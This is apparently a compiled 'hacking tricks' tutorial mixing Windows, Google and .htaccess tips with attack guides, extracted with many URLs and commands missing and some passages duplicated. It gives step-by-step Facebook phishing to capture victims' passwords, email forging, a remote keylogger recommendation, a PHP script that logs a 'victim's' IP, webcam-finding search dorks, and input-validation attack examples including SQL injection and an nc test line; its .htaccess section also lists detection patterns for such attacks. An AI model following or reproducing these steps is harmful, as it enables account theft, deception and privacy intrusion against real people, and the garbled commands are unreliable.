    Whenever you right click on a file, you see some options there, like "Editplus 3", if you have
    editplus 3 installed, "Open with notepad ++", if you have notepad ++ installed on your system.
    And, a few more. If you want to remove one or two from them, then what you will do? The
    simple answer is uninstall it. But, what if you need that program and just want to remove it from
    right click menu? Some program may also leave that option even after uninstallation as a dead
    shortcut to edit. Here is a tutorial which will help you remove these permanently or


            Open run (Win+R or All programs>Accessories>Run)

            Type "regedit" without "quotes" and hit enter.

            Browse to this registry key:

            If you want to remove Editplus shortcut permanently, then simply select it, right click
             and then delete it. This will remove it permanently, you may get it back after reinstalling
             the software.

            If you want to do it temporarily, then right click on key value and modify it (Or double
             click on it).

            Just add a minus (-) sign without (brackets) before the key value and save it. For
             example, if you key value is "{36D94110-787C-4828-9C1B-0DAFEBC36069}" then make it "-
             {36D94110-787C-4828-9C1B-0DAFEBC36069}" and save it. This will remove editplus
             temporarily and if you want it back, just remove the minus (-) sign and save it. Just add a
             minus (-) sign without (brackets) before the key value and save it. For example, if you key
             value is "{36D94110-787C-4828-9C1B-0DAFEBC36069}" then make it "-{36D94110-787C-4828-
             9C1B-0DAFEBC36069}" and save it. This will remove editplus temporarily and if you want
             it back, just remove the minus (-) sign and save it.

     Email Forging (Fakemailing)
As the name says, send an email from any email id in the world without the victims password.

Its also known as fakemailer, just visit this url: FakeMailer( and fill the form,
Fill every required fields. You may also attach attachment by the fakemailer.

Now, click on send and victim has a fakemail.

Fake mail doesn't contain any additional text like sent by fakemailer, etc. Its too good to make
your friends fool. And this tutorial is not any criminal or spamming act. Do it on your own risk.

 Trace Email
Got a mail, want to know the exact location of the sender?, then you are at right place. First you
will need the full header of that email, like if you are using yahoomail then open the mail and
click on action, now click on view full header to get the full header but if you are at gmail, click
on options in that mail and now click on see/view original to get the header, copy header and
visit this link:Trace Email(, now paste the full header
and click on trace email sender, wait for some seconds and it will give you the exact information
aboout the sender.
It may failed sometimes if the user is using dynamic IP i.e. IP get changed everytime victim
connects internet. So, when you get a mail and if you want to trace it, then trace that mail
immediately, otherwise it may not work.

 Mail Bomber
Mail Bombing is the most powerful attack to a victim. In this method, someone bomb victim
email id by sending hundreds or thousands of mails at once. This gives high server load to both
users, one sender and also on receiver. Mail bombing can even crash a server! Thats why we
removed our hosted mail bomber, the code is too dangerous to paste here, someone may easily
misuse it. So, this tutorial now just contain a few lines about mail bombing.

 Facebook hack [Updated]
Facebook hacking i.e. Hack a facebook account is illegal, we are teaching you this to prevent you
from these scams. You will be responsible if you hack any account. If your account has been
hacked, then please follow this link,, answer a few simple
question and get your account back.

There are several ways of hacking facebook. Some are phishing, remote keylogger, keylogger,
cookie stealing, click hijacking, etc.

What is Keylogger?

A keylogger is a software which records every typed letter of your keyboard or of your virtual

system keyboard.

How it works?

You install a remote keylogger to the victim pc without visiting the victim pc, it records the key
stroke and screenshots and mail it to you.
This way you can hack anyone account. But, it costs. The name of a working remote keylogger is
"SniperSpy", but it costs at least $19 for a month. If you want to hack account using remote
keylogger, then you can buy it. More info on rates and plans are available
Please dont ask us for the crack of this keylogger because its not available to us.
You can also use a keylogger(Not a remote keylogger), just install it on your pc, then allow
someone to use his/her facebook account on your system, as he/she will enter his/her details, it
will get recorded in your system. Just look at it and id hacked. A good invisible keylogger is

What is Phishing?

Phishing is a way of attempting to acquire information such as usernames, passwords, and credit
card details by masquerading as a trustworthy entity in an electronic communication.
Communications purporting to be from popular social web sites, auction sites, online payment
processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is
typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter
details at a fake website whose look and feel are almost identical to the legitimate one. Phishing
is an example of social engineering techniques used to deceive users, and exploits the poor
usability of current web security technologies. Attempts to deal with the growing number of
reported phishing incidents include legislation, user training, public awareness, and technical
security measures.

How to Hack Facebook account?

First we will talk about requirement.
The one and only requirement is a site. You must create a site to host(upload) the phishing files.
You may create a FREE Site here: Its free and easy. We found this
site after searching a lot on internet.
Download Phishing Files:

Download phishing files
Extract it using winrar[If you dont have winrar, then you may get it for free from
You will find four files and one folder under that rar file.
Upload all files and folder to your created site[For example, if you site is,
then create a folder with name "facebook", then upload your files in "facebook" folder].
Prepare phishing URL[Making phishing url, if you have uploaded all files to "facebook" folder,
then your URL should look like this,].
Dont rename any file!
Everything is ready now.
Send a mail to victim(person that you want to hack) with phishing URL. Write any message you
want, like click here to see your gift, etc.

    Its recommended to hyperlink a text with that link, like write "Click here" and then hyperlink it
    to phishing URL. There are option of hyperlink in every mailing client/site. You may also short
    the URL using to make it more perfect. Send Mail!
    Now, you have to wait for some time. When the victim will enter his/her ID and Password, it will
    get recorded in a text file that you have uploaded named "passes.txt". Check this file at regular
    interval and if you find password, then the account is HACKED.
    In phishing, there is a 50-50 chance. If the victim know about phishing, he/she will not enter
    his/her password and phishing attack will fail. So, there is no guarantee. Do it on your own risk.

     Facebook: Post a blank status or
      comment on facebook
    Yes, as the name says, "Facebook: Post a blank status or comment on facebook", you can also post
    a blank message in your status or in comment in facebook. Just follow the simple steps listed

    Steps to post blank status:
   Copy this code "@[0:0: ]" without "quotes".
   Paste it wherever you want.
   Hit post.
    Now, you posted a blank status message.

    Steps to post blank comment:
   Go to comment box to write comment.
   Press and hold ALT key and type 0173 (Dont leave ALT key and type 0173), now leave ALT key and
    hit enter.
    Now, you posted a blank comment.

     Firewall
    A firewall is a part of a computer system or network that is designed to block unauthorized
    access while permitting authorized communications. It is a device or set of devices that is
    configured to permit or deny network transmissions based upon a set of rules and other
    criteria.Firewalls can be implemented in either hardware or software, or a combination of both.
    Firewalls are frequently used to prevent unauthorized Internet users from accessing private
    networks connected to the Internet, especially intranets. All messages entering or leaving the
    intranet pass through the firewall, which inspects each message and blocks those that do not
    meet the specified security criteria.
    There are several types of firewall techniques:

   Packet filter:

    Packet filtering inspects each packet passing through the network and accepts or rejects it based
    on user-defined rules. Although difficult to configure, it is fairly effective and mostly
    transparent to its users. It is susceptible to IP spoofing.

   Application gateway:
    Applies security mechanisms to specific applications, such as FTP and Telnet servers. This is very
    effective, but can impose a performance degradation.

   Circuit-level gateway:
    Applies security mechanisms when a TCP or UDP connection is established. Once the connection
    has been made, packets can flow between the hosts without further checking.

   Proxy server:
    Intercepts all messages entering and leaving the network. The proxy server effectively hides the
    true network addresses.

   In simple words:
    Firewall is computer program which gives power to user to allow or block the internet
    connections for a particular application or many applications.

    A free and easy to use firewall : Firewall

     Format through USB
    Do you want to format and install Operating system(OS)? And you want to do it by using your USB?
    Then you are at right place.

    In this tutorial you will learn, how to format and install any OS from your USB/Pendrive/memory
    card/Flash drive.
    The method is very simple and you can use without any hassles.
    Needless to say that your motherboard should support USB Boot feature to make use of the
    bootable USB drive.
    Requirements: *USB Flash Drive (Minimum 4GB)
    *Windows 7 or Vista installation files.(CD/DVD)
    Follow the below steps to create bootable Windows 7/Vista USB drive using which you can install
    Windows 7/Vista easily.
    Code that you have to execute is written in green color.
   Plug-in your USB flash drive to USB port and move all the contents from USB drive to a safe
    location on your system.
   Open Command Prompt with admin rights. Use any of the below methods to open Command
    Prompt with admin rights.
    *Type cmd in Start menu search box and hit Ctrl+ Shift+ Enter.

    *Go to Start menu > All programs > Accessories, right click on Command Prompt and select Run as
   You need to know about the USB drive a little bit. Type in the following commands in the
    command prompt:
    First type
    DISKPART and hit enter .
    Next type
    LIST DISK command and note down the Disk number (ex: Disk 1) of your USB flash drive. You may
    see the disk size to know about your USB.
   Next type all the below commands one by one. Here I assume that your disk drive no is ?Disk 1?.If
    you have Disk 2 as your USB flash drive then use Disk 2.Refer the above step to confirm it. So
    below are the commands you need to type and execute one by one:
    (Format process may take a few minutes)
    Don?t close the command prompt as we need to execute one more command at the next step.
    Just minimize it.
   Next insert your Windows7/Vista DVD into the optical drive and check the drive letter of the DVD
    drive. In this guide I will assume that your DVD drive letter is ?D? and USB drive letter is ?H?
    (open my computer to know about it).
   Maximize the minimized Command Prompt in the 4th step.Type the following command now:
    D: CD BOOT and hit enter.
    Where ?D? is your DVD drive letter.
    CD BOOT and hit enter again.
   Type another command given below to update the USB drive with BOOTMGR compatible code.
    Where ?H? is your USB drive letter.
   Copy your Windows 7/Vista DVD contents to the USB flash drive.
   Your USB drive is ready to boot and install Windows 7/Vista. Only thing you need to change the
    boot priority at the BIOS to USB from the HDD or CD ROM drive. I won?t explain it as it?s just the
    matter the changing the boot priority or enabling the USB boot option in the BIOS.

    Or, You may use Novicorp wintoflash, it will do it in just few clicks, Downlaod from
    here,, run it and follow guide.

 Google Tricks
This tutorial will teach you important and useful google tricks which is so easy but hiden to
normal users.
*Know your IP address:

Code to Google:
what is my ip

It will give you this result, Your public IP address is 123.456.789.000, [123.456.789.000 will get
changed to your IP address]. Now, you know your IP.

*Using google as unit converter:

Code to Google:
Any unit you want.

It depends on you, enter your desired number, for example 1GB=?MB or 15421GB=?MB, etc.
Please remember MB and Mb are both different things, Mb is a smaller unit than MB. 1MB is equal
to 8 Mb. So, be careful while looking up.

*Advanced site search:

Code to Google:

This will show you all links containing in the url. This is most powerful search
method to find something, just replace with your desired site, for example or

*Google as proxy:

You may use google as free proxy, just open, and enter a site
url that is blocked, and change the site language, for example, if you want to surf a site which is
in english language, then select another language that you know, for example change it to hindi,
and surf it freely. Well, its a trick but its too complicated, simply you can

*Using google as currency converter:

Simply replace the currecy code(INR) and number(1) as desired, it will give you 100% correct and
latest info.

*Know time of a country:
country time

Replace country from the code to your desired country, for example, change it to india, then the
code is india time or change it to new york, then the code is new york time, it will show the
current time of that country.

*Flight status:
Delta fligh 007

Simply enter the flight name, and it will return you arrival and departure times.

*Rotate google at 360*:
do a barrel roll

Your screen will rotate completely once. Its a great trick.

*Know license of a software(Is it freeware or shareware):
winrar license?

Simply change winrar to your desired product and it will give you a message like this, Best guess
for WinRAR License is Shareware, this result will change according to your software. Please note
this may not give all product info.

One more trick, avoid redirection in google is discussed later.

 Google trick to avoid redirection
  according to your country
Did you ever noticed that, when you enter the address in your address bar and
hit enter it will redirect it into your country domain. For example if you are an Indian and you
are browsing from India,when you enter the address in address bar and hit
enter it will redirect into
This facility in google provide you to more specific search results regarding your country.

Now here is the question, If you won't want to redirect into your country,

What you do now?

I am here with the answer for the above question. You can simply avoid the redirection of into targeted countries by a simple trick.
You can add three more letters after the tailing slash. You can add ncr after the tailing slash.
That is you can enter the domain as This will lead you to the original
google home page,that is
In the above url ncr stands for no country redirection.
Now visit page and enjoy extended search...
Enjoy this great Trick.

 Get back in digital universe-Wayback
Here is a tutorial which will teach you how to get back in the digital universe and watch the old
look of any site.
Its quite simple and easy.
You just need to visit this url and then enter the site that
you want to lookup and click on "Take me back".
For example, type and click on "Take me back".
It will show you a calendar, and now you have to choose the year, date and month. And, then you
are on your requested page.

A line from that page:

"This calendar view maps the number of times was crawled by the
Wayback Machine, not how many times the site was actually updated. More info in the FAQ."

Please note that wayback doesn't have archive of all sites, say all new sites.

 Getting Remote Ip
As the name says, getting remote IP i.e. get IP address of a person chatting with you or you may
mail to grab its IP. This is so simple and works in just one click!
Yes, its easy.
Just send this link to the victim: and when the victim will click
on it, it IP will get recorded in a text file, located
And it will get redirected to a page saying your IP is now recorded, you may change it with your
desired page and text.
Its all because of a php code, code is given below:


$dt = date("l dS \of F Y h:i:s A");
$data = $ip.' '.$dt."\n";
fwrite($file, $data);
header( 'Location: done.php' ) ;

Replace done.php with the page you want to redirect, for example,, or with
your url,, it depends on you.
Save the above code with any name, like record.php and upload it to your site or use any free
site, you may use, to create a free account.
Upload your files here, now your url to get victim IP should look like this, or change it according to your need.
You dont have any need to create ip_log.txt file, it will get generated automatically.
Now, open ip_log.txt file and see the recorded IP.
Enjoy getting your victim IP.

 Gathering info about website
As the name says, Gathering info about website, you can gather info about any website in just
few clicks.
Just you need to visit a site i.e.
Now, you have to enter the website url there and hit enter and it will give you the complete info
about that website. There are hundreds of similar sites but we have just posted this because its
best and correct.

 Htaccess tips and tricks
What is .htaccess?A .htaccess (hypertext access) file is a directory-level configuration file
supported by several web servers, that allows for decentralized management of web server

Warning: Its a very sensitive file, even a mistake dot or comma or anything wrong will make your
site unreponsive (500 internet server error), so read this tutorial very carefully.

How to apply these codes?Just edit your .htaccess file via cpanel or any method. Copy the below
code that you want, edit if required. Change from the code to your (if
present) then add it to your site.

What to do in case of error? Just delete the added code and save it. If you have added a lot of
codes then dont delete all, just delete that code which is causing problem. To detect that code,
its better to add codes one by one and then check the site is working or not.

After you done, dont forget to check your site performance, make sure your site is working fine
after adding the codes.


Set Timezone
Sometimes, when you using date or mktime function in php, it will show you a funny message
regarding timezone. This is one of the way to solve it. Set timezone for your server. A list of
timezone is available here:


SetEnv TZ Australia/Melbourne
SEO Friendly 301 Permanent Redirects
Why it's SEO friendly? Nowadays, some modern serach engine has the capability to detect 301
Permanent Redirects and update its existing record.


Redirect 301
Send Custom Headers
Send your custom headers.


Header set P3P "policyref=\"\""
Header set X-Pingback ""
Header set Content-Language "en-US"
Header set Vary "Accept-Encoding"

Set Cookie using htaccess
Set cookies.


Header set Set-Cookie "language=%{lang}e; path=/;" env=lang
Change Charset and Language headers
Change Charset and Language headers.


AddDefaultCharset UTF-8
DefaultLanguage en-US

Skip the download dialogue
Usually when you try to download something from a web server you get a request asking whether
you want to save the file or open it. To avoid that you can use the below code on your .htaccess


AddType application/octet-stream .pdf
AddType application/octet-stream .zip
AddType application/octet-stream .mov

Skip www
One of the SEO guideline is, make sure there is only one URL pointing to your website. Therefore,
you will need this to redirect all www traffic to non-ww, or the other way around.


RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_HOST} ^ [NC]
RewriteRule ^(.*)$$1 [L,R=301]

Custom Error page
Create a custom error page for each of the error codes.


ErrorDocument 401 /error/401.php
ErrorDocument 403 /error/403.php
ErrorDocument 404 /error/404.php
ErrorDocument 500 /error/500.php

If you just want to show a message instead of page, use below code:

ErrorDocument 401 Authentication Required
ErrorDocument 403 Forbidden
ErrorDocument 404 Not found
ErrorDocument 500 Internet server error

Compress files
Optimize your website loading time by compressing files into smaller size.


# compress text, html, javascript, css, xml:
AddOutputFilterByType DEFLATE text/plain
AddOutputFilterByType DEFLATE text/html
AddOutputFilterByType DEFLATE text/xml
AddOutputFilterByType DEFLATE text/css
AddOutputFilterByType DEFLATE application/xml
AddOutputFilterByType DEFLATE application/xhtml+xml
AddOutputFilterByType DEFLATE application/rss+xml
AddOutputFilterByType DEFLATE application/javascript
AddOutputFilterByType DEFLATE application/x-javascript

Cache files

File caching is another famous approach in optimizing website loading time


# 1 YEAR
<filesMatch "\.(ico|pdf|flv)$">
Header set Cache-Control "max-age=29030400, public"
# 1 WEEK
<filesMatch "\.(jpg|jpeg|png|gif|swf)$">
Header set Cache-Control "max-age=604800, public"
# 2 DAYS
<filesMatch "\.(xml|txt|css|js)$">
Header set Cache-Control "max-age=172800, proxy-revalidate"
# 1 MIN
<filesMatch "\.(html|htm|php)$">
Header set Cache-Control "max-age=60, private, proxy-revalidate"

Disable caching for certain file type
Well, in the other hand, you can disable caching for certain file type.


# explicitly disable caching for scripts and other dynamic files
<FilesMatch ".(pl|php|cgi|spl|scgi|fcgi)$">
Header unset Cache-Control

.htaccess Time Cheatsheet
#    300 5 MIN
#    600 10 MIN
#    900 15 MIN
#   1800 30 MIN
#   2700 45 MIN
#   3600 1 HR
#   7200 2 HR
# 10800 3 HR
# 14400 4 HR
# 18000 5 HR
# 36000 10 HR
# 39600 11 HR
# 43200 12 HR
# 46800 13 HR
# 50400 14 HR
# 54000 15 HR
# 86400 24 HR

#     86400    1 DAY
#    172800    2 DAY
#    259200    3 DAY
#    345600    4 DAY
#    432000    5 DAY
#    518400    6 DAY
#    604800    7 DAY
#    604800    1 WEEK
#   1209600    2 WEEK
#   1814400    3 WEEK
#   2419200    4 WEEK
#    2419200   1 MONTH
#    4838400   2 MONTH
#    7257600   3 MONTH
#    9676800   4 MONTH
#   12096000    5 MONTH
#   14515200    6 MONTH
#   16934400    7 MONTH
#   19353600    8 MONTH
#   21772800    9 MONTH
#   24192000   10 MONTH
#   26611200   11 MONTH
#   29030400   12 MONTH

Set site admin name and email
Set your(admin email) name and email address(admin email).


SetEnv SITE_WEBMASTER "Hackalone"

                            Disable your server signature to protect your site.


ServerSignature Off

    otlinking protection with .htaccessHate it when people stealing bandwidth from your
website by using images that are hosted in your web server? Use this, you will able to prevent it
from happening.


RewriteBase /
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www.)?*$ [NC]

RewriteRule .(gif|jpg|swf|flv|png)$ /feed/ [R=302,L]

                 If you want to increase the security level of your website, you can chuck these
few lines of codes to prevent some common hacking techniques by detecting malicious URL


RewriteEngine On

# proc/self/environ? no way!
RewriteCond %{QUERY_STRING} proc/self/environ [OR]

# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]

# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]

# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|[|\%[0-9A-Z]{0,2}) [OR]

# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|[|\%[0-9A-Z]{0,2})

# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]

                                       The following code will prevent user to access your
.htaccess file. Also, you can block multiple file type as well.


# secure htaccess file
<Files .htaccess>
order allow,deny
deny from all

# prevent viewing of a specific file
<Files secretfile.jpg>
order allow,deny
deny from all

# multiple file types
<FilesMatch ".(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$">
Order Allow,Deny
Deny from all

                               Avoid the server from displaying directory index, or the opposite.


# disable directory browsing
Options All -Indexes

# enable directory browsing
Options All +Indexes

                               You can change the default page index.html, index.php or
index.htm to something else.


DirectoryIndex business.html

                                               domainBlock visitor coming from a website.


# block visitors referred from indicated domains
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_REFERER} [NC,OR]
RewriteCond %{HTTP_REFERER} [NC,OR]
RewriteRule .* - [F]

                                    -Agent HeaderThis method could save your bandwidth quota
by blocking certain bots or spiders from crawling your website.


# block visitors referred from indicated domains
<IfModule mod_rewrite.c>
SetEnvIfNoCase ^User-Agent$

    er|webpictures) HTTP_SAFE_BADBOT
    SetEnvIfNoCase ^User-Agent$ .*(libwww-perl|aesop_com_spiderman) HTTP_SAFE_BADBOT
    Deny from env=HTTP_SAFE_BADBOT


    # secure directory by disabling script execution
    AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
    Options -ExecCGI

                                 Prevent your contents of a directory by using this code.


    IndexIgnore *

                                 Prevent your php.ini file by using this code.


    <Files php.ini>
    order allow,deny
    deny from all

     How to speed up installation of
      windows xp
    This tip will be very helpful for those who frequently install windows xp operating system.
    Normally Windows XP installation takes around 40 minutes to complete, but through this trick
    you can now save 10-15 minutes. This simple tricks goes this way.

   Boot through Windows XP CD.
   After all the files are completely loaded, you get the option to select the partition. Select.
   Now Format the partition, whether it is normal or quick with NTFS or FAT.
   Once the formatting is completed, All the setup files required for installation are copied. Restart
    your system by pressing Enter.
   Now, here begins the Simple trick to save 10-15 minutes.

   After rebooting, you get a screen where it takes 40 minutes to complete or finalize the OS
   Now, Press SHIFT + F10 Key :- This opens command prompt.
   Enter Taskmgr at the command prompt window. This will open Task Manager.
   Click the Process Tab, here we find a process called Setup.exe -> Right Click on Setup.exe -> Set
    Priority -> Select High or Above Normal. Initially it will be Normal.

    Thats it, no more work to do. Relax yourself and see how fast the installation process completes.

     How to make folder with name CON
      and others
    Can you make a folde in your system with name "con"? No you cant, because its a system reserved
    folder and cant be created in simple way.
    But, after reading this tutorial, you will be able to create con folder or any other folder with any
    First of all, make a new folder, select all text of the folder, i.e. "new folder", delete it, and hold
    ALT, dont leave ALT, now type 0160, now you can leave ALT, type any name, like con, prn, nul,
    etc and hit enter, your folder will get created with no error...
    Its the simple way.

     Hide Text in an Image File
    Hello friends, now i am going to teach you how you can hide text (Your message) in any image
    file, image file will look as normal, no measurable change of size, no damaged picture quality, no
    program needed, its free and happen in a few easy steps!
    First open run and then type cmd, (Open cmd), now navigate the folder where you copied the
    files, one image file(with .jpg, .bmp, etc extensions) and one text file(which contains your
    message), navigate it by using this command, "cd" without "quotes".
    For example, if your files are in "D" drive, then after opening cmd, type, D: and hit enter, now
    you are in your d drive, now if your folder name is hackalone, then, type cd hackalone and hit
    enter, now you are in the hackalone folder. Do this process to locate your files.
    Now, the main step, make your image file and text file ready.
    Type this command after navigating your folder,

    copy /b imagefilename.jpg + textfilename.txt outputimagename.jpg

    Type the exact code, but dont forgot to replace the few words, imagefilename.jpg with your
    image file name and with proper extension, textfilename.txt with your text file,
    outputimagename.jpg your output image name, use whatever you want, but remember to use
    right extension.

    All done, your message is now hidden, no one can say that the image file contains a message by

looking the image, no quality loss, full gain!

But, how to view it?
Open the image with notepad, and go to last, and see the last line, your message will be at the
last, read it and get protected.

Please note that, opening an image file of size 10 mb or more with notepad may freeze your
system for few seconds, so keep patience.

 Hibernation
Hello friends, do you want to learn how to disable/enable or delete/undelete windows
hibernation file, its size is approx 2 GB(approx), if you dont use hibernation, then you can delete
it freely, it will give you 2 GB(approx) of free space!
Today's there is a very small number of users who are using hibernation, in simple, no one wants
to use it!
First of all, run command prompt(cmd), run it as administrator, open it as you want, by searching
in all programs, or directly via run, to open via run, type cmd in run and hit enter!(Note:- To
follow this step, you must be login in adminstrator or main account!)

Now, type the following command there,

powercfg.exe -h off
To disable and delete hibernation file, and

powercfg.exe -h on
To enable or undelete your hibernation file.

Hibernation file can be deleted or restored anytime, you can delete it freely by using the above
stated command and if you need hibernation in future, then you can restore it just by using the
second restoration command.

There is no harm in doing this!

 Hide/Unhide any drive using cmd
Yes, you can hide/unhide any drive from my computer using cmd(command prompt.). But, you
cant hide your drive that is running windows (Commonly C:). After hiding any drive, you wont be
able to browse it. It will removed from your computer until you want it back. So, read this
tutorial very carefully.
Steps to hide:

   Go to All Programs> Run (Win+r).
   Type "diskpart" without "quotes" and hit enter.
   Now type "list volume" without "quotes" and hit enter.
   Now type "select volume d" without "quotes" (Change d with the letter of the drive that you want
    to hide) and hit enter.
   You will get a message like this "Volume _ is selected volume" , i.e. your volume is now selected.
   Now type "remove letter d" without "quotes"(Change d with the letter of the drive that you want
    to hide) and hit enter. And now your drive is hidden.

    Steps to unhide:
     Go to All Programs> Run (Win+r).
     Type "diskpart" without "quotes" and hit enter.
     Now type "list volume" without "quotes" and hit enter.
     Now type "select volume d" without "quotes" (Change d with the letter of the drive that you
       want to unhide) and hit enter.
     You will get a message like this "Volume _ is selected volume" , i.e. your volume is now
     Now type "assign letter d" without "quotes"(Change d with the letter of the drive that you
       want to unhide) and hit enter. And now your drive is available.

     Hide/Unhide any drive using software
    Hi friends, this tutorials is to teach you how to hide any drive of your computer, like you can hide
    your "C" drive from my computer, so no one can get direct access to it.

    Requirements: Tuneup Utilities [Latest Version Recommended]

    Homepage: Tuneup Homepage (

    Now download a trial and install it and it will work for 15 day with full functionallity.

    Go to all programs and now on tuneup option and now search for "Tuneup System Control" and
    open it.

    Go to drive option and now on the third tab and now click on settings.

    Deselect that drive you want to hide and click on ok and after that apply.

    And all done, drive is invisible from "MyComputer".
    Your computer will logoff after this process.
    To Redisplay it, just go again there and select it, now click on ok, and drive is back again.
    After hiding drive you can also get access to it by typing "Drive letter:" in the run, for example,

 Image to URL
Yes, its true. You can change any image to URL/Text. For example, click the below link, it will
open in a new tab. A image will be loaded. See the url bar, it is just a code. :)

Click me to see the code

To convert your image to URL, just visit this link,
Click on "Choose file", locate your image, then click on "Encode". You will be get redirected to
another page containing your image base64 string. All done, you got the code. Use it wherever
you want. To show it in html page, use <img></img> .Please remember, the maximum file size
allowed there is 15 MB. Large size image will give large base64 string. And sometimes your
brower may hang.

 Image is edited or not?
Do you ever got an image in which something is paranormal but the owner claims its real not
How you will identify that the image is edited or not by photoshop?
Well, this seems to be difficult but its not!!!
Just follow my instructions.
Requirements: JPEGsnoop - JPEG File Decoding Utility

This is the one and only requirement of size 500 KB(~approx).
Get it from the above link(Go through the above link and find Click to Download .ZIP and click to
Run it. Will look like this,

Now, click on File>Open Image, locate the image the click on open. Wait for few seconds, and
then drag the scroller down.
Look for the result at the bottom.

Check the result, if the image is edited the result will be "ASSESSMENT: Class 1 - Image is
processed/edited" but if its not edited the result will be "ASSESSMENT: Class 4 - Uncertain if
processed or original
While the EXIF fields indicate original, no compression signatures
in the current database were found matching this make/model"
Disclaimer: This tool and method may sometimes give false information, for example if you have
scanned the imagem in a computer scanner then the tool will say processed.

 Input Validation Attack
Input Validation Attacks are where an attacker intentionally sends unusual input in the hopes of
confusing the application.

The most common input validation attacks are as follows-

1) Buffer Overflow :- Buffer overflow attacks are enabled due to sloppy programming or
mismanagement of memory by the application developers. Buffer overflow may be classified into
stack overflows, format string overflows, heap overflows and integer overflows. It may possible
that an overflow may exist in language?s (php, java, etc.) built-in functions.
To execute a buffer overflow attack, you merely dump as much data as possible into an input
field. The attack is said to be successful when it returns an application error. Perl is well suited
for conducting this type of attack.
Here?s the buffer test, calling on Perl from the command line:
$ echo ?e ?GET /login.php?user=\
> `perl ?e ?print ?a? x 500?`\nHTTP/1.0\n\n? | \
nc ?vv website 80
This sends a string of 500 ?a? characters for the user value to the login.php file.
Buffer overflow can be tested by sending repeated requests to the application and recording the
server's response.

2) Canonicalization :- These attacks target pages that use template files or otherwise reference
alternate files on the web server. The basic form of this attack is to move outside of the web
document root in order to access system files, i.e., ?../../../../../../../../../boot.ini?. This type
of functionality is evident from the URL and is not limited to any one programming language or
web server. If the application does not limit the types of files that it is supposed to view, then
files outside of the web document root are targeted, something like following-

3) Cross-site Scripting (XSS) :- Cross-site scripting attacks place malicious code, usually
JavaScript, in locations where other users see it. Target fields in forms can be addresses, bulletin
board comments, etc.
We have found that error pages are often subject to XSS attacks. For example, the URL for a
normal application error looks like this:
This displays a custom access denied page that says, ?Invalid password?. Seeing a string
on the URL reflected in the page contents is a great indicator of an XSS vulnerability. The attack
would be created as:
That is, place the script tags on the URL.

4) SQL Injection :- This kind of attack occurs when an attacker uses specially crafted SQL queries
as an input, which can open up a database. Online forms such as login prompts, search enquiries,
guest books, feedback forms, etc. are specially targeted.
The easiest test for the presence of a SQL injection attack is to append ?or+1=1? to the URL and
inspect the data returned by the server. example:-' or 1=1-- .

 Java Code To Play With A Website

    Open any website, just copy and paste the below code in the url and hit the enter button, now
    you are able to write/delete/modify anything on that page.[Offline editing, editing will not
    affect online site]


    JavaScript:document.body.contentEditable='true'; document.designMode='on'; void 0

     Local DNS Spoofing
    It is the most powerful and hidden feature of windows, a majority of windows users does not
    know about this.
    But, this is really a great feature, which provide security and control.
    The main feature is you can block any website.
    It totally depends on hosts file.
    Hosts file: When you surf the internet, then your browser first look into your hosts file for the
    site's IP and works as instructed in there. But, if not found then it lookup the internet for IP of
    that site.
    Location: C:\Windows\System32\drivers\etc

    Open hosts file with notepad.

    Localhost: It is your default system address, known as "localhost" or "".

    How to block a website:

    First open hosts file and write these at the last.
    {replace example with your desired website}
    Now suppose, we have to block google, then write

    Now save it and google is now blocked on your system, to unblock, just delete the added lines
    and save it. Do not use http:// otherwise blocking will not work.

     Live WebCam Hack
    Pick up any string and search it on google, now click on any link and see the live webcam.

   inurl:?CgiStart?page=?
   inurl:/view.shtml
   intitle:?Live View / ? AXIS
   inurl:view/view.shtml
   inurl:ViewerFrame?Mode=

   inurl:ViewerFrame?Mode=Refresh
   inurl:axis-cgi/jpg
   inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
   inurl:view/indexFrame.shtml
   inurl:view/index.shtml
   inurl:view/view.shtml
   liveapplet
   intitle:?live view? intitle:axis
   intitle:liveapplet
   allintitle:?Network Camera NetworkCamera? (disconnected)
   intitle:axis intitle:?video server?
   intitle:liveapplet inurl:LvAppl
   intitle:?EvoCam? inurl:?webcam?
   intitle:?Live NetSnap Cam-Server feed?
   intitle:?Live View / ? AXIS?
   intitle:?Live View / ? AXIS 206M?
   intitle:?Live View / ? AXIS 206W?
   intitle:?Live View / ? AXIS 210?
   inurl:indexFrame.shtml Axis
   inurl:?MultiCameraFrame?Mode=Motion? (disconnected)
   intitle:start inurl:cgistart
   intitle:?WJ-NT104 Main Page?
   intitle:snc-z20 inurl:home/
   intitle:snc-cs3 inurl:home/
   intitle:snc-rz30 inurl:home/
   intitle:?sony network camera snc-p1?
   intitle:?sony network camera snc-m1?
   intitle:?Toshiba Network Camera? user login
   intitle:?netcam live image? (disconnected)
   intitle:?i-Catcher Console ? Web Monitor?

    It will show any webcam active in the world which is available for public. Hacking a specific
    webcam is not supported by us. Its highly illegal and violate the victim's personal life. Please
    dont ask it to us.

     Monitor Internet Usage
    A lot of internet users want to monitor his/her internet usage. I think you too. But, many of
    them dont know how to do it. So, we have written this tutorial for you all.
    By reading this tutorial, you will be able to monitor your internet usage, i.e. your download

    usage, upload usage, etc.
    How to monitor your internet usage:

    First of all, you need a software named "Broadband Usage Meter", you may download it from
    here: , its a small software but powerful.
    After download, double click on it to run the setup wizard, then install. It may ask you to select
    your network, then select it. For example, if you are using photon +, then installer will show you
    tata photon + in the list, select it and continue. Dont forget to check any option of auto start on
    windows startup.
    It will run automatically on windows startup.
    Now, its monitoring your internet usage. A meter will come at the top of your screen in green
    color. This will show your all statics.

    Another good program like "Broadband Usage Meter" is:
    NetWorx, its also good. Just install it and start using it.

    There are a few more good programs for this, you may also like
